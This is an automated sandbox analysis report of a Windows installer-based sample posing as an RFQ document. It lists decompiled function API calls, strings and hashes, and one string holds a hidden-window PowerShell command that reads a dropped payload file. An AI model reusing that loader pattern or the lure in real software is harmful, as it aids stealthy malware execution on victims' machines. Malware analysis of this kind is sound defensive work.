Associated: 00000000.00000002.1667012394.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667012394.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ-SulselBarruII2-COALCOMMLDOC.jbxd

Similarity

API ID: CreateInstance
String ID: C:\Users\user\AppData\Local\Ubarberet\Graustark\resultalet
API String ID: 542301482-3984083083
Opcode ID: fa9b9c77b3530ce2a287439bb95ef55590dcf9a522a2fbed8be09240dc413261
Instruction ID: 8307c529eb9feefa1617cd4f78f27985085e4fae61a1ffd37fb0b3adda41be3b
Opcode Fuzzy Hash: fa9b9c77b3530ce2a287439bb95ef55590dcf9a522a2fbed8be09240dc413261
Instruction Fuzzy Hash: 00410575A00209AFCB40DFE4C989EAD7BB5FF48308B20456EF505EB2D1DB799982CB54

Uniqueness

Uniqueness Score: -1.00%

Function 00403FA1 Relevance: 61.6, APIs: 34, Strings: 1, Instructions: 357
windowstringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403FDD
ShowWindow.USER32(?), ref: 00403FFD
GetWindowLongW.USER32(?,000000F0), ref: 0040400F
ShowWindow.USER32(?,00000004), ref: 00404028
DestroyWindow.USER32 ref: 0040403C
SetWindowLongW.USER32(?,00000000,00000000), ref: 00404055
GetDlgItem.USER32(?,?), ref: 00404074
SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00404088
IsWindowEnabled.USER32(00000000), ref: 0040408F
GetDlgItem.USER32(?,00000001), ref: 0040413A
GetDlgItem.USER32(?,00000002), ref: 00404144
SetClassLongW.USER32(?,000000F2,?), ref: 0040415E
SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 004041AF
GetDlgItem.USER32(?,00000003), ref: 00404255
ShowWindow.USER32(00000000,?), ref: 00404276
KiUserCallbackDispatcher.NTDLL(?,?), ref: 00404288
EnableWindow.USER32(?,?), ref: 004042A3
GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 004042B9
EnableMenuItem.USER32(00000000), ref: 004042C0
SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 004042D8
SendMessageW.USER32(?,00000401,00000002,00000000), ref: 004042EB
lstrlenW.KERNEL32(00422F08,?,00422F08,00000000), ref: 00404315
SetWindowTextW.USER32(?,00422F08), ref: 00404329
ShowWindow.USER32(?,0000000A), ref: 0040445D

Strings

tt, xrefs: 00404377

Memory Dump Source

Source File: 00000000.00000002.1666865220.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1666846826.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666879868.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666899327.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666899327.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666899327.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666899327.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666899327.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666899327.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667012394.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667012394.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ-SulselBarruII2-COALCOMMLDOC.jbxd

Similarity

API ID: Window$Item$MessageSendShow$Long$EnableMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
String ID: tt
API String ID: 121052019-2355969153
Opcode ID: f0b43cd8e7f2e41f431c118fff2888e9d111a3339ebed408ace792690fb64996
Instruction ID: 6cd4652e30ec862c23bd12a6162173760bab2c1fa5186c41ecc3a298f9dddab8
Opcode Fuzzy Hash: f0b43cd8e7f2e41f431c118fff2888e9d111a3339ebed408ace792690fb64996
Instruction Fuzzy Hash: 7FC1C0B1600204ABDB216F21EE49E2B3A69FB94709F41053EF751B51F0CB795882DB2E

Uniqueness

Uniqueness Score: -1.00%

Function 00403BF3 Relevance: 45.7, APIs: 13, Strings: 13, Instructions: 215
stringregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00406915: GetModuleHandleA.KERNEL32(?,00000020,?,0040360C,0000000C,?,?,?,?,?,?,?,?), ref: 00406927
Part of subcall function 00406915: GetProcAddress.KERNEL32(00000000,?), ref: 00406942

lstrcatW.KERNEL32(1033,00422F08), ref: 00403C74
lstrlenW.KERNEL32(: Completed,?,?,?,: Completed,00000000,C:\Users\user\AppData\Local\Ubarberet,1033,00422F08,80000001,Control Panel\Desktop\ResourceLocale,00000000,00422F08,00000000,00000002,74DF3420), ref: 00403CF4
lstrcmpiW.KERNEL32(?,.exe,: Completed,?,?,?,: Completed,00000000,C:\Users\user\AppData\Local\Ubarberet,1033,00422F08,80000001,Control Panel\Desktop\ResourceLocale,00000000,00422F08,00000000), ref: 00403D07
GetFileAttributesW.KERNEL32(: Completed), ref: 00403D12
LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Local\Ubarberet), ref: 00403D5B

Part of subcall function 00406468: wsprintfW.USER32 ref: 00406475

RegisterClassW.USER32(004289C0), ref: 00403D98
SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403DB0
CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403DE5
ShowWindow.USER32(00000005,00000000), ref: 00403E1B
GetClassInfoW.USER32(00000000,RichEdit20W,004289C0), ref: 00403E47
GetClassInfoW.USER32(00000000,RichEdit,004289C0), ref: 00403E54
RegisterClassW.USER32(004289C0), ref: 00403E5D
DialogBoxParamW.USER32(?,00000000,00403FA1,00000000), ref: 00403E7C

Strings

: Completed, xrefs: 00403CBB, 00403CC4, 00403CD2, 00403D21, 00403D27
RichEd32, xrefs: 00403E2F
Control Panel\Desktop\ResourceLocale, xrefs: 00403C27
C:\Users\user\AppData\Local\Temp\, xrefs: 00403BF8
C:\Users\user\AppData\Local\Ubarberet, xrefs: 00403C83, 00403C8B, 00403D2E, 00403D34, 00403D44
RichEdit, xrefs: 00403E4E
_Nb, xrefs: 00403D77, 00403DDF
RichEd20, xrefs: 00403E21
1033, xrefs: 00403C13, 00403C6F
RichEdit20W, xrefs: 00403E3F, 00403E45
"C:\Users\user\Desktop\RFQ-SulselBarruII2-COALCOMMLDOC.exe", xrefs: 00403BF6
.exe, xrefs: 00403D01
.DEFAULT\Control Panel\International, xrefs: 00403C5F

Memory Dump Source

Source File: 00000000.00000002.1666865220.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1666846826.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666879868.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666899327.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666899327.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666899327.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666899327.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666899327.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666899327.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667012394.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667012394.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ-SulselBarruII2-COALCOMMLDOC.jbxd

Similarity

API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
String ID: "C:\Users\user\Desktop\RFQ-SulselBarruII2-COALCOMMLDOC.exe"$.DEFAULT\Control Panel\International$.exe$1033$: Completed$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Ubarberet$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
API String ID: 1975747703-2158125148
Opcode ID: 0ef04955f1a6976a10593322067df9edaff6e7f7a832361b73f8beed2d85b6c9
Instruction ID: 6a74b9b34ded998ebd2751605f77428bf44f11e359ee0ac59d58ca77ea789e65
Opcode Fuzzy Hash: 0ef04955f1a6976a10593322067df9edaff6e7f7a832361b73f8beed2d85b6c9
Instruction Fuzzy Hash: 2C61B770200740BAD620AF669D46F2B3A7CEB84B45F81453FF941B61E2CB7D5942CB6D

Uniqueness

Uniqueness Score: -1.00%

Function 00403082 Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 181
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount.KERNEL32 ref: 00403093
GetModuleFileNameW.KERNEL32(00000000,00437800,00000400), ref: 004030AF

Part of subcall function 00406011: GetFileAttributesW.KERNELBASE(00000003,004030C2,00437800,80000000,00000003), ref: 00406015
Part of subcall function 00406011: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00406037

GetFileSize.KERNEL32(00000000,00000000,00438000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,00437800,00437800,80000000,00000003), ref: 004030FB
GlobalAlloc.KERNELBASE(00000040,?), ref: 00403231

Strings

soft, xrefs: 00403170
Null, xrefs: 00403179
C:\Users\user\AppData\Local\Temp\, xrefs: 00403089
Inst, xrefs: 00403167
Error launching installer, xrefs: 004030D2
"C:\Users\user\Desktop\RFQ-SulselBarruII2-COALCOMMLDOC.exe", xrefs: 00403088
C:\Users\user\Desktop, xrefs: 004030DD, 004030E2, 004030E8
Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 00403258

Memory Dump Source

Source File: 00000000.00000002.1666865220.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1666846826.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666879868.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666899327.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666899327.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666899327.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666899327.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666899327.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666899327.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667012394.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667012394.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ-SulselBarruII2-COALCOMMLDOC.jbxd

Similarity

API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
String ID: "C:\Users\user\Desktop\RFQ-SulselBarruII2-COALCOMMLDOC.exe"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
API String ID: 2803837635-3226123988
Opcode ID: f6f149303cde104692999693530b98443d3dd0b2c967e283c98aa5a581eac7be
Instruction ID: 0271efb430f2efbe2fca7880162b12dddab7439e54d706f300c55aed9b32fb97
Opcode Fuzzy Hash: f6f149303cde104692999693530b98443d3dd0b2c967e283c98aa5a581eac7be
Instruction Fuzzy Hash: 7B51C071A01304ABDB209F65DD85B9E7FACAB09316F10407BF904B62D1D7789E818B5D

Uniqueness

Uniqueness Score: -1.00%

Function 0040655E Relevance: 19.5, APIs: 6, Strings: 5, Instructions: 204
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSystemDirectoryW.KERNEL32(: Completed,00000400), ref: 00406680
GetWindowsDirectoryW.KERNEL32(: Completed,00000400,00000000,spilfgterier,?,?,00000000,00000000,00418EC0,00000000), ref: 00406696
SHGetPathFromIDListW.SHELL32(00000000,: Completed), ref: 004066F4
CoTaskMemFree.OLE32(00000000,?,00000000,00000007), ref: 004066FD
lstrcatW.KERNEL32(: Completed,\Microsoft\Internet Explorer\Quick Launch), ref: 00406728
lstrlenW.KERNEL32(: Completed,00000000,spilfgterier,?,?,00000000,00000000,00418EC0,00000000), ref: 00406782

Strings

: Completed, xrefs: 0040658B, 00406645, 0040664C, 00406650, 00406669, 0040666A, 0040667F, 00406695, 004066C6, 004066F2, 00406727, 0040672D, 0040674A, 0040675D, 0040677B, 00406781, 0040678A, 004067BF
\Microsoft\Internet Explorer\Quick Launch, xrefs: 00406722
spilfgterier, xrefs: 00406582
Software\Microsoft\Windows\CurrentVersion, xrefs: 00406651
"powershell.exe" -windowstyle hidden "$Harish116=Get-Content 'C:\Users\user\AppData\Local\Ubarberet\Graustark\resultalet\Unmering, xrefs: 00406757

Memory Dump Source

Source File: 00000000.00000002.1666865220.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1666846826.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666879868.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666899327.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666899327.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666899327.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666899327.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666899327.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666899327.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667012394.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667012394.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ-SulselBarruII2-COALCOMMLDOC.jbxd

Similarity

API ID: Directory$FreeFromListPathSystemTaskWindowslstrcatlstrlen
String ID: "powershell.exe" -windowstyle hidden "$Harish116=Get-Content 'C:\Users\user\AppData\Local\Ubarberet\Graustark\resultalet\Unmering$: Completed$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch$spilfgterier
API String ID: 4024019347-1109186065
Opcode ID: 14c9f03641932d7153c154bb414b77852189b75d1473d82c894b9adbe9647435
Instruction ID: c1bee3e663878f3afad94de22ef935420ccf361ce06c76a1d76179cfc985cdfa
Opcode Fuzzy Hash: 14c9f03641932d7153c154bb414b77852189b75d1473d82c894b9adbe9647435
Instruction Fuzzy Hash: 266146B1A043019BDB205F28DD80B6B77E4AF84318F65053FF646B32D1DA7D89A18B5E

Uniqueness

Uniqueness Score: -1.00%

Function 00401774 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 145
stringtimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

lstrcatW.KERNEL32(00000000,00000000), ref: 004017B5
CompareFileTime.KERNEL32(-00000014,?,flyvesikringstjenesterne,flyvesikringstjenesterne,00000000,00000000,flyvesikringstjenesterne,C:\Users\user\AppData\Local\Ubarberet\Graustark\resultalet,?,?,00000031), ref: 004017DA

Part of subcall function 00406521: lstrcpynW.KERNEL32(?,?,00000400,0040366E,00428A20,NSIS Error,?,00000008,0000000A,0000000C), ref: 0040652E

Part of subcall function 004055A6: lstrlenW.KERNEL32(spilfgterier,00000000,00418EC0,00000000,?,?,?,?,?,?,?,?,?,004033F2,00000000,?), ref: 004055DE
Part of subcall function 004055A6: lstrlenW.KERNEL32(004033F2,spilfgterier,00000000,00418EC0,00000000,?,?,?,?,?,?,?,?,?,004033F2,00000000), ref: 004055EE
Part of subcall function 004055A6: lstrcatW.KERNEL32(spilfgterier,004033F2), ref: 00405601
Part of subcall function 004055A6: SetWindowTextW.USER32(spilfgterier,spilfgterier), ref: 00405613
Part of subcall function 004055A6: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405639
Part of subcall function 004055A6: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405653
Part of subcall function 004055A6: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405661

Strings

flyvesikringstjenesterne, xrefs: 00401792, 0040179B, 004017BA, 004017C6, 004017FC, 00401812, 00401830, 0040186C, 004018ED, 004018F6, 00401900, 0040190B
Software\ukasens\, xrefs: 00401826, 00401844
C:\Users\user\AppData\Local\Ubarberet\Graustark\resultalet, xrefs: 004017A3
C:\Program Files (x86)\Common Files\ukases.lnk, xrefs: 0040183A, 00401856

Memory Dump Source

Source File: 00000000.00000002.1666865220.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1666846826.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666879868.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666899327.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666899327.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666899327.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666899327.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666899327.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666899327.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667012394.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667012394.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ-SulselBarruII2-COALCOMMLDOC.jbxd

Similarity

API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
String ID: C:\Program Files (x86)\Common Files\ukases.lnk$C:\Users\user\AppData\Local\Ubarberet\Graustark\resultalet$Software\ukasens\$flyvesikringstjenesterne
API String ID: 1941528284-1258657125
Opcode ID: 8735ad9560c18e5a7f29f6a8244760e17f86ea249fb7e5f19f194b0f67ebe764
Instruction ID: 1777f765e23ed303a4c4324df0f40fc052c607b9e3f25272d24a03cacca2a4dc
Opcode Fuzzy Hash: 8735ad9560c18e5a7f29f6a8244760e17f86ea249fb7e5f19f194b0f67ebe764
Instruction Fuzzy Hash: 9E41A531900509BACF117BA9DD86DAF3AB5EF45328B20423FF512B10E1DB3C8A52966D

Uniqueness

Uniqueness Score: -1.00%

Function 004055A6 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 72
stringwindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

lstrlenW.KERNEL32(spilfgterier,00000000,00418EC0,00000000,?,?,?,?,?,?,?,?,?,004033F2,00000000,?), ref: 004055DE
lstrlenW.KERNEL32(004033F2,spilfgterier,00000000,00418EC0,00000000,?,?,?,?,?,?,?,?,?,004033F2,00000000), ref: 004055EE
lstrcatW.KERNEL32(spilfgterier,004033F2), ref: 00405601
SetWindowTextW.USER32(spilfgterier,spilfgterier), ref: 00405613
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405639
SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405653
SendMessageW.USER32(?,00001013,?,00000000), ref: 00405661

Strings

spilfgterier, xrefs: 004055C7, 004055D7, 004055DD, 00405600, 0040560C

Memory Dump Source

Source File: 00000000.00000002.1666865220.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1666846826.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666879868.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666899327.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666899327.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666899327.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666899327.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666899327.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666899327.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667012394.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667012394.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ-SulselBarruII2-COALCOMMLDOC.jbxd

Similarity

API ID: MessageSend$lstrlen$TextWindowlstrcat
String ID: spilfgterier
API String ID: 2531174081-4173586789
Opcode ID: a9fafcf7327b9621bb894f8e2d9ac48d1397335c234e36f420f2517ccdad5277
Instruction ID: deb6953f75989b306d4e6df0e2073f5bc52164b7b2c012b705af3b177d86a23e
Opcode Fuzzy Hash: a9fafcf7327b9621bb894f8e2d9ac48d1397335c234e36f420f2517ccdad5277
Instruction Fuzzy Hash: 8F21B375900158BACB119FA5DD84ECFBF75EF45364F50803AF944B22A0C77A4A51CF68

Uniqueness

Uniqueness Score: -1.00%

Function 004032B9 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 155
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount.KERNEL32 ref: 0040331A
GetTickCount.KERNEL32 ref: 0040339B
MulDiv.KERNEL32(7FFFFFFF,00000064,?), ref: 004033C8
wsprintfW.USER32 ref: 004033DB

Strings

bacillebrerens background friskmaledes tysket broidery miasmatize permutationists handlekraftigstes vauntie postekspeditionsforbrugslyst unbulled unfrigidness svaje candyflosser tildelingen.grnttorv freeloader fuges plasticposens grafbasen cuculliform brudep, xrefs: 004032E3
... %d%%, xrefs: 004033D5

Memory Dump Source

Source File: 00000000.00000002.1666865220.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1666846826.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666879868.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666899327.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666899327.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666899327.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666899327.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666899327.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666899327.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667012394.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667012394.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ-SulselBarruII2-COALCOMMLDOC.jbxd

Similarity

API ID: CountTick$wsprintf
String ID: ... %d%%$bacillebrerens background friskmaledes tysket broidery miasmatize permutationists handlekraftigstes vauntie postekspeditionsforbrugslyst unbulled unfrigidness svaje candyflosser tildelingen.grnttorv freeloader fuges plasticposens grafbasen cuculliform brudep
API String ID: 551687249-3670306494
Opcode ID: bb69fc25e18161a0849df33240b9b7daf63c30e93ac5b68caaa3da3af3354023
Instruction ID: 25ee467b37f7358b1d8943912f63d539eb3ef7c07a249f5ee2dc3eaa61b9464a
Opcode Fuzzy Hash: bb69fc25e18161a0849df33240b9b7daf63c30e93ac5b68caaa3da3af3354023
Instruction Fuzzy Hash: 5B518E31900219EBCB11DF65DA44BAF3FA8AB40726F14417BF804BB2C1D7789E408BA9

Uniqueness

Uniqueness Score: -1.00%

Function 00401E53 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 43
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetDC.USER32(?), ref: 00401E56
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401E70
MulDiv.KERNEL32(00000000,00000000), ref: 00401E78
ReleaseDC.USER32(?,00000000), ref: 00401E89
CreateFontIndirectW.GDI32(0040CDC8), ref: 00401ED8

Strings

Times New Roman, xrefs: 00401EBE

Memory Dump Source

Source File: 00000000.00000002.1666865220.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1666846826.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666879868.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666899327.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666899327.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666899327.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666899327.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666899327.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666899327.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667012394.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667012394.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ-SulselBarruII2-COALCOMMLDOC.jbxd

Similarity

API ID: CapsCreateDeviceFontIndirectRelease
String ID: Times New Roman
API String ID: 3808545654-927190056
Opcode ID: 38e72d3fa34f290ba30ebd3d426a2c0b0b6180222ce13588ce59ce9b8aabfda5
Instruction ID: 1c21784e8a12ec6bf8935da156a17e2c336e66cb5fe6e154f3a2125ab74843e9
Opcode Fuzzy Hash: 38e72d3fa34f290ba30ebd3d426a2c0b0b6180222ce13588ce59ce9b8aabfda5
Instruction Fuzzy Hash: 5A018871954240EFE7015BB4AE9ABDD3FB5AF15301F10497AF141B61E2C6B90445DB3C

Uniqueness

Uniqueness Score: -1.00%

Function 004068A5 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 36
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004068BC
wsprintfW.USER32 ref: 004068F7
LoadLibraryExW.KERNELBASE(?,00000000,00000008), ref: 0040690B

Strings

UXTHEME, xrefs: 004068AE
%s%S.dll, xrefs: 004068F1

Memory Dump Source

Source File: 00000000.00000002.1666865220.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1666846826.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666879868.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666899327.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666899327.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666899327.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666899327.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666899327.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666899327.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667012394.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667012394.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ-SulselBarruII2-COALCOMMLDOC.jbxd

Similarity

API ID: DirectoryLibraryLoadSystemwsprintf
String ID: %s%S.dll$UXTHEME
API String ID: 2200240437-1106614640
Opcode ID: 7a73cbb44207cafadb11ab8eaaa41fd963bfa172cfc882b2dd9c54e233860d96
Instruction ID: d40490b37a95929041f6b14fe17981fa15644a851550e805e000283098582d10
Opcode Fuzzy Hash: 7a73cbb44207cafadb11ab8eaaa41fd963bfa172cfc882b2dd9c54e233860d96
